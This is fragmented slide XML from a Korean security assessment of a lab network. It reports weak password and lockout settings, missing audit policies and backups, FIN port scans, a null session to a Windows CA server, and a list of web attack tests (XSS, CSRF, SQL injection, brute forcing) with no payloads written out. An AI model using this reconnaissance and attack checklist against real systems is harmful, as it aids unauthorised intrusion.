            <a:r>
              <a:rPr lang="en-US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42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일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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최소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암호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길이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제한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없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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최소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암호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사용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기간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제한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없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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계정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잠금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기간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및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임계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값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설정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없음</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" kern="100" dirty="0"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28444" y="1331068"/>
            <a:ext cx="32431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500" kern="1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ko-KR" altLang="ko-KR" sz="2500" kern="1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윈도우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" kern="1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2008 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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63157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5" descr="https://lh4.googleusercontent.com/XbFNQZ_b76P-_J2DAfulAMqb7dFZ_mW01yUYfXVN2dpfE6cdy2aWA1p3Btkno5CvU2B8QGlJ6vq5CDSu1xSc0tOifGcaC_w3dyFKHjLMG9F2hjq-SjO0heK7GPlaTGnk-pGMHK5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120" y="2004934"/>
            <a:ext cx="3965609" cy="225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https://lh4.googleusercontent.com/r7BD5MSKDSJwkOl0fhbrJFzFmtAomL5VTvJF3TW-dZ0xkrZ_SiU2ca6F0dMHFIJMdJ2cNQdiU3CGijSrFoUtOHT2DbXdHB-fTsnTOgTZwVCI7WI7Ca3tEiYaWT3E3KMcjWORmX9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615" y="2004935"/>
            <a:ext cx="4173313" cy="225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401185" y="4499036"/>
            <a:ext cx="946355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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1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etc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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1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pam.d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/system-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1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auth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파일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확인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결</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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과</a:t>
            </a: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:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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암호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복잡도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설정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없이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재시도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가능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횟수만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설정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,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암호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사용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최대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최소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길이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설정은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기본값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,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암호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만료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경고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일은</a:t>
            </a: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7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일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전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,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암호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최소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길이는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5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로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설정</a:t>
            </a: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rgbClr val="000000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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1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etc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/default/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1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useradd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파일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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확인결과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:</a:t>
            </a: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INACTIVE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의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값이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-1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로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계정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잠금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설정이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되어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있지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않음</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="20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01185" y="1292567"/>
            <a:ext cx="25859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500" kern="1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500" kern="1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CentOS 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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endParaRPr lang="ko-KR" altLang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4269736" y="81915"/>
            <a:ext cx="916188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계정정책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 [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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암호 정책 및 계정 잠금 정책</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US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441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51686" y="93756"/>
            <a:ext cx="7940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계정정책 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[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계정 설정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]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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4" name="그림 6" descr="https://lh6.googleusercontent.com/awAcytYQNoT0R8ekGYMduPnCus7yGL3l-Hw-W8rIduOq9qpkLUMZzGLxatGkE8hDzqaW5118APTU_-5jZs4fZU736DOXqNRK4eUSrtpxHVB-PKtUafLOiZ93Zium-ilKygscYWT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596" y="1175995"/>
            <a:ext cx="5073065" cy="236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7" descr="https://lh6.googleusercontent.com/n6AbGRr0IC773o7Mvcx-e9Yx8QUo5SrePfiFpt3Nxn5E8pKHF6VXkOxMj9oOYqPXpIdRn0yo_v2eHN1MvdliTIsvt1-VvDgSCpGLEmWp0hU1lNgeswF6VjdFDVGHf2Iarl2uI2d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595" y="4109987"/>
            <a:ext cx="5073065" cy="249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703329" y="4689466"/>
            <a:ext cx="4039491" cy="1370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ko-KR" sz="2000" kern="1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CentOS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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" kern="100" dirty="0" err="1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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" kern="100" dirty="0" err="1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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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파일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확인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결과</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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root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계정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이외에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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user1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계정만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존재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사용자에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따른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구분이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보이지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않음</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" kern="100" dirty="0"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93705" y="1524853"/>
            <a:ext cx="4039491" cy="1700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윈도우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서버는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관리자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계정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및</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Guest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계정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명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그대로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사용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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, Guest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계정은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사용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안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함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상태</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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원격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접속에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필요한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별도의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계정을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사용하지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않음</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" kern="100" dirty="0"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55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8" descr="https://lh5.googleusercontent.com/SJKVfxx8wI1GqqWDblwTd6BaaEM_x65pmY-rO2ddJT8ujgB1PsTscuSDwremBNCE1KF7cGJJas01Zrxd7wgyvHPGzhXIITgmQQdGi3ehA5ef-Z7_qsRYPliAMCRkkl9nQa5QYoL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095" y="1523116"/>
            <a:ext cx="4136096" cy="310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10" descr="https://lh4.googleusercontent.com/cfcOCFIEl78VJXhiWNO5QPR6uLHwQljBvcaJlAlS01Cn3NdM3DHICTpfYI-JbVYihdwApzJDkTUaQ_OMld8MSMP04qE025bCmO2IGpo6g_WAhPviiuMpnAk5xdxoSxHbfNwNUFw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238" y="1523116"/>
            <a:ext cx="4607213" cy="308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807190" y="5245548"/>
            <a:ext cx="8666124" cy="503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현재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설정된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감사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정책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없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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, Linux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의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로그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파일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경로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확인</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2500" kern="100" dirty="0"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51686" y="93756"/>
            <a:ext cx="7940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감사정책 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[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개체 액세스 및 이벤트 감사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]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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852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22290" y="135366"/>
            <a:ext cx="1016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HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>개요</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0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4566964" y="2208999"/>
            <a:ext cx="3094575" cy="2961190"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="79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>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0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560070" y="2208999"/>
            <a:ext cx="3094575" cy="2961190"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="78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>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0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6654404" y="2207577"/>
            <a:ext cx="3094575" cy="2961190"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="78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>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0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8868731" y="2207577"/>
            <a:ext cx="3094575" cy="2961190"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="79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>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35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  <a:cs typeface="DejaVu Sans Mono" panose="020B060903080402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98936" y="3211118"/>
            <a:ext cx="2605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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    1.</a:t>
            </a:r>
          </a:p>
          <a:p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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>회사소개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  <a:cs typeface="DejaVu Sans Mono" panose="020B06090308040202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75844" y="3211118"/>
            <a:ext cx="2605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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     2.</a:t>
            </a:r>
          </a:p>
          <a:p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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>조직현황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  <a:cs typeface="DejaVu Sans Mono" panose="020B06090308040202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39130" y="3117139"/>
            <a:ext cx="26053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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       3.</a:t>
            </a:r>
          </a:p>
          <a:p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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>보안</a:t>
            </a:r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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>취약점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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     점검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  <a:cs typeface="DejaVu Sans Mono" panose="020B06090308040202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693122" y="3211118"/>
            <a:ext cx="2605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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    4.</a:t>
            </a:r>
          </a:p>
          <a:p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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>점검결과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  <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49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14" y="2751766"/>
            <a:ext cx="2134993" cy="213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1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11" descr="https://lh5.googleusercontent.com/uf20lk31lki7oCiDR42FA8KYldk6Cy_sT7MUB80iNg296FqAygoBAaAfTfwm7wNP9ezibTQhILPPR9Q1M6Y8i2eCxEQ318YeXRRkPDhL8Nz0e0E2RjHi-SZb7OIU8835e8DCko0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381" y="1462488"/>
            <a:ext cx="3696102" cy="316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12" descr="https://lh6.googleusercontent.com/gXJ2qi3tm_hzl_aPIB97ZlyKxMYA9tgGlzSQVp1GYEJNy4brjSAVz4JK9j7i-fvbNQnVVyycXtTkx5hXcKpoECCL2EvbieQUpcw-mP6rICVOCHY5vfAVbkF6cCuxbYB6Evguk2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290" y="1445835"/>
            <a:ext cx="3870523" cy="318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4936050" y="5253475"/>
            <a:ext cx="4563501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2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설정된 백업 일정 없음</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="ko-KR" sz="2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백업 일정 설정 및 확인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568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13" descr="https://lh5.googleusercontent.com/UCz5heXs74pSstoDy-eeCC5gNcDI5FMo9J8TuqorFjEmFCZGBBCezTf5lhYxjrANm1y-t6qS2mVErkzNGiITl1NC5FglLyW3OYhpd3rK17-RZtgszvf9FVVwF6tHErSqIemLSqM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971" y="2393399"/>
            <a:ext cx="4346650" cy="154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14" descr="https://lh5.googleusercontent.com/eEA9y8qdxaYrg5ovbWBqNjzJWhraOCGfSYK4pW4bGI1WSyh1g4ehaKEd-O77nZylRPLmqtnx99yT97nG5UtY7lyelT8FUx4I_a0QhPoGGDcHCCtbZqrR83KuAz8J-RChHti7T8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990" y="1578697"/>
            <a:ext cx="5126575" cy="289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3446947" y="5015813"/>
            <a:ext cx="7535477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웹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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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https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접속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설정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확인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및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http-&gt;https Redirect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확인</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" kern="100" dirty="0"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웹 서버 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SSL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설정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125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759" y="1036203"/>
            <a:ext cx="6388317" cy="53486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59071" y="2043479"/>
            <a:ext cx="46095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40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Host Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="40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Port Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="40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Null Session</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="40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44842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5" descr="https://lh4.googleusercontent.com/6wr4S9oUms0rhtOjN0gNR5hWUCtCOd2cjKWKtavvN0K1x47JyhRBNRSDLzShddvgVNsenyTI5tB8Xs3k7HHykfbeUVqIJHOChrxbuapojT6AgrjVD5RtC9LLBQUt7xCkw-zWC7y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364" y="1324683"/>
            <a:ext cx="4031196" cy="299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16" descr="https://lh4.googleusercontent.com/SiWKJSpNy2KOpvSn7GsIdsb3vPn3zdXz1O9B4c6r8L_dyURdtJ7qfIx33GmJbEo3JRxq_hsxVuNCrnNLBrNSkvkFXufi2hppXxZ4Rj1lc7sv2HdpoajkNJRbZz_fKRb6DoH9bpd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924" y="1324683"/>
            <a:ext cx="3849303" cy="299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391595" y="4829627"/>
            <a:ext cx="897713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10.10.100.0/24</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" alt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en-US" altLang="ko-KR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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="20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Web, DNS[Primary], DHCP[Primary], DB, Game </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="20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서버</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"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10.10.200.0/24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0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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="20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DNS[Secondary], DHCP[Secondary], VPN, CA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="20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서버 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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Host Scanning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637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https://lh5.googleusercontent.com/Gmrylfdu7XQfB3bW0_4bKUAMei-MOFbhcgBQA_USosI8gTIfweeEBFOWvUWos5HJ_UV9skiFv24TMgldSf8pcZOqSIHBVTLWRLK9yMllpi1J--ujsUKCdbQvtUzbaVRT17EyIhjl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040" y="1466500"/>
            <a:ext cx="6225619" cy="336538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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600811" y="5219872"/>
            <a:ext cx="7344076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ko-KR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웹 서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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[Linux, 10.10.100.10]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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를 대상으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Fin Scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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을 시도했을 때의 결과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Port Scanning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571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8" descr="https://lh3.googleusercontent.com/qE59ydD5Vt1t1sSDuL7uoFlcxPmkWjtk7k-OgQhXi4pNw1JAICBliMv5LFZH0Y-JjduBPCQe90yOJG_auSlhoxAm8TK59dfoEMuvmPh2NaD9KD5pr4bgTI7tq5gJde5N3SQm_DP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404" y="1423201"/>
            <a:ext cx="4621931" cy="311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19" descr="https://lh5.googleusercontent.com/cnlAjUZ11amCchfYQdjUwIUazkvNvRBXA29wPMhOYl2KUfy8cLxngrgYFPUIjyUvKIp2qfaHaFhVEus8S3k6StBRPv7eh-YzM0nB8r9-9R2hIfkRTuaTxJhnzRG_MvNTz7jViss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319" y="1425923"/>
            <a:ext cx="4831882" cy="311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849078" y="4888589"/>
            <a:ext cx="8614609" cy="1285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VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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[Window 2008 R2, 10.10.200.50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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대상</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Fin Scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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시도</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" kern="100" dirty="0" smtClean="0"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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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방화벽이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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있다면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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불가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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endParaRPr lang="en-US" altLang="ko-KR" sz="2000" kern="100" dirty="0" smtClean="0"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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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방화벽이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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없다면 열려 있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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확인 가능</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" kern="100" dirty="0"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Port Scanning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756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20" descr="https://lh6.googleusercontent.com/EbmPaF_s-MRVuRaDyHTxnvsMBTxENeC_ynmafuRF7i2QPAa6Fc3X-5SpyBZfYxy05IHjAGefojiRPv1wweBNaYzOcdeP5ArZskcQ6H-4T1j6t256Za508KMOj2LbjhaSp3nC_DY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739" y="1310798"/>
            <a:ext cx="4347878" cy="298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21" descr="https://lh5.googleusercontent.com/xBXmoc4-XkLvobW97MO7Wru8nLAvi3BCKYZrZpTLRixdz70EQ1zu3ZoNPqccGuRc1DI4bnCq6NYhJlpH1vS2pYdErKWVtm35vjQkm1vW01QFBvwIUcIsMNJPfuti9EIicgHMp3u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12" y="1310799"/>
            <a:ext cx="4531857" cy="298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858343" y="4594954"/>
            <a:ext cx="8362548" cy="1882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Window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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를 사용하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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CA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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서버에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Null Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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연결</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" kern="100" dirty="0" smtClean="0"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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하지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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연결된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Null Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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으로는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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접근</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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불가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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아래 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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링크에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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확인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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가능 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="73914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5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[https://social.technet.microsoft.com/Forums/windowsserver/en-US/841523db-8c4b-43a0-9f28-be7270f92e2b/disable-server-2008-null-sessions?forum=winservergen]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="15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Null Session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399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074" y="1290701"/>
            <a:ext cx="7433495" cy="534861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815239" y="1689479"/>
            <a:ext cx="5662972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22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2200" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>PUT,Delete Method 확인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22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2200" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Banner Grabbing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22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D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="22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ire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="22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ctory L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2200" b="1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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="22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sting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" b="1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2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2200" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Sniffing 을 통한 Session Hijacking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22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2200" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>IP/ Password Brute Forcing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22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2200" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>XSS[Cross Site Script] 공격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22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2200" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>CSRF(Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> Forgery] 공격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22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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" b="1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sz="22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  [인증우회, Blind </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" b="1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22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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="22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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="22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]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2200" b="1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070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그림 134" descr="https://lh6.googleusercontent.com/KE8HfPOCUoDJ74MVobKJp5AN_RHBRbTOfA1PtZqJ6AQLekh2b2D3dMKTlCbjQBaI9aNijEgXgm-4BrUEsVrmIWl2ex2dR8nVfygCensh1UVwSwFPGiIq3_VWQA984XwDIXIVYKT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785" y="5362561"/>
            <a:ext cx="4782776" cy="42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그림 130" descr="https://lh4.googleusercontent.com/fIFYRpjz5PVvUyW-kGFDYhUF51MTb9NGXRuGAr_j2JOV1lT97m_8bXtOpVYbr0lmJfjHvG6ReD72Y0rlUkpuLMzAbBJmAI8l8F46DsBuESOTJKsiJmsJBkGiTcpYiiLIGVEbJDX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759" y="819764"/>
            <a:ext cx="4587498" cy="266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그림 131" descr="https://lh3.googleusercontent.com/OYPt-xyQrcKoQO3o4cH6yAzkhGshYTo4pY2hsbqrXrCy4dwTdxOMj61TwDt7d2a8E1zfOUSFvKdqwvDlq5JsowPtf6iL-APzvw7vh-XNI7nXhS7vVvKLVZ2HTdXCxTfkXAqXm6m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560" y="1787735"/>
            <a:ext cx="4391487" cy="73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그림 132" descr="https://lh5.googleusercontent.com/lcuUwDfwLswBLdj1nQ668Zc8zP7sCaLQbLqhiI897H1l7CJPWM4jsIgXLzwVXX12MVBaaZJ2BvvzqgSGtzP9P-lC_NseU5bi40Eqy_8sctAmlVKBm_ndD1g2hCDwrWVJ3V6h2eWX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784" y="4429373"/>
            <a:ext cx="4782776" cy="50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그림 133" descr="https://lh6.googleusercontent.com/gjXX0jDwN5lCbvc8gFZPHw_ag7PSUBXJ6KoRmxQTuWJtxv1a7G_ZJKIhG815ogopXGPm7Rvc6dUpO-QLnq0bJlZpV9kPVF7mhjDvjhXIa6p06xebSj6ryBHW_68Chtjodx4rcYR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764" y="4413035"/>
            <a:ext cx="3911078" cy="536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그림 135" descr="https://lh3.googleusercontent.com/P2Mu6efB5jpKDUhRCUK_W4Q5xOGXuDpEiYPuTZ9H27ziXoRt3oBw3f9RZw6LkAfPtJNcWG82RuRmMGAJe5hUxsdwjzroBqaAr88v0i_IQvgiVs5iDfjGAuEWi49UVUP1mpOL4Xl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362" y="5290423"/>
            <a:ext cx="3952480" cy="56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4785533" y="3115444"/>
            <a:ext cx="23115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2491784" y="3629750"/>
            <a:ext cx="993389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메인 페이지 접속 후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Paros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를 통해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Packet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확인</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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: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HTTP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1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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버전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확인 가능</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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785533" y="4144144"/>
            <a:ext cx="23115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4277533" y="459828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2557759" y="6035884"/>
            <a:ext cx="407194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PUT, Delete Method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허용 안됨</a:t>
            </a:r>
